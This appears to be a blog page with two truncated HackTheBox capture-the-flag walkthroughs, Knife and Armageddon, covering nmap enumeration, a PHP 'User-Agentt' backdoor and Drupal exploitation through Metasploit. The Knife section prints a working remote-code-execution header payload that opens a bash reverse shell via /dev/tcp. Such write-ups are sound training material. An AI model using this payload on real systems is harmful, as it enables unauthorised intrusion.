Posts

Showing posts from 2021

HackTheBox : Knife Walkthrough

Image
  Concepts Learnt : Enumeration 2. Burp Suite 3. PHP Vulnerability 4. Ruby (Knife) Steps to Enumerate : Run an Nmap Scan to find all the open ports! Command : nmap 10.10.10.242 -A 10.10.10.242  IP of the Server -A  This options makes  Nmap  make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information. -vv  Defines level 2 verbosity for the scan We see that there are 2 ports open : 22/tcp- SSH port 80/tcp- HTTP port Lets check the http site on port 80: It is   a simple site with no clickable elements! We can see that PHP version is 8.1.0 which is vulnerable to  user agentt RCE Let run the site through burp suite and exploit Capture using the proxy! Now pass it through the repeater and use the RCE code to execute! Command:  User-Agentt: zerodiumsystem(“/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’”); Add your IP and port in the command above before executing! Now run the netcat list

HackTheBox : Armageddon Walkthrough

Image
  Concepts Learnt : 1. Enumeration 2. Snap privilege escalation 3. Drupal exploit (metasploit) 4. python2 Steps to Enumerate : Run an Nmap Scan to find all the open ports! Command : nmap 10.10.10.233 -A 10.10.10.233  IP of the Server -A  This options makes  Nmap  make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information. -vv  Defines level 2 verbosity for the scan We see that there are 4 ports open : 22/tcp- SSH port 80/tcp- HTTP port 2021/tcp — Servexec(filtered) 7435/tcp — unknown(filtered) Lets   check the http site on port 80: A simple website with User Login! Lets try the simple admin:password combination to check! Doesn’t work! Checking the page source, we can see that is Drupal version 7 Let’s check if we can work a way around the login page! Exploring, I found that Drupal 7 can be exploited using Metasploit! Command : msfconsole Command : search drupal We will use the drupalgeddon2 Com